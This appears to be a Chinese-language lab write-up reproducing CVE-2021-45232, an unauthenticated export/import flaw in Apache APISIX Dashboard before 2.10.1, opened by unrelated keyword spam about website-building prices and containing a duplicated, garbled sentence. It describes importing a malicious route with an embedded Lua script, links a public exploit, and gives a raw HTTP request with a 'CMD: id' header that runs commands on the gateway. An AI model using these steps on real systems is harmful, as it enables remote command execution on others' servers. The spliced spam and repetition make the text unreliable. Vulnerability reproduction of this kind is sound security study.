用织梦做网站费用,做电商网站价格,空投网站建设,江苏中益建设官方网站Apache APISIX是一个动态、实时、高性能API网关#xff0c;而Apache APISIX Dashboard是一个配套的前端面板。
Apache APISIX Dashboard 2.10.1版本前存在两个API/apisix/admin/migrate/export和/apisix/admin/migrate/import#xff0c;他们没有经过droplet框架的权限验证而Apache APISIX Dashboard是一个配套的前端面板。
Apache APISIX Dashboard 2.10.1版本前存在两个API/apisix/admin/migrate/export和/apisix/admin/migrate/import他们没有经过droplet框架的权限验证导致未授权的攻击者可以导出、导入当前网关的所有配置项包括路由、服务、脚本等。攻击者通过导入恶意路由可以用来让Apache APISIX访问任意网站甚至执行LUA脚本。 1.利用/apisix/admin/migrate/export和/apisix/admin/migrate/import两个Apache APISIX Dashboard提供的未授权API我们可以简单地导入一个恶意配置文件其中包含我们构造的LUA脚本
注意的是这个配置文件的最后4个字符是当前文件的CRC校验码所以最好通过自动化工具来生成和发送这个利用数据包比如[这个POC](https://github.com/wuppp/cve-2021-45232-exp)。 2.添加完恶意路由后你需要访问Apache APISIX中对应的路径来触发前面添加的脚本。值得注意的是Apache APISIX和Apache APISIX Dashboard是两个不同的服务Apache APISIX Dashboard只是一个管理页面而添加的路由是位于Apache APISIX中所以需要找到Apache APISIX监听的端口或域名。
在当前环境下Apache APISIX监听在9080端口下。我们发送数据包
GET /okw1Rh HTTP/1.1
Host: your-ip:9080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q0.9,en;q0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Connection: close
CMD: id
Cache-Control: max-age0
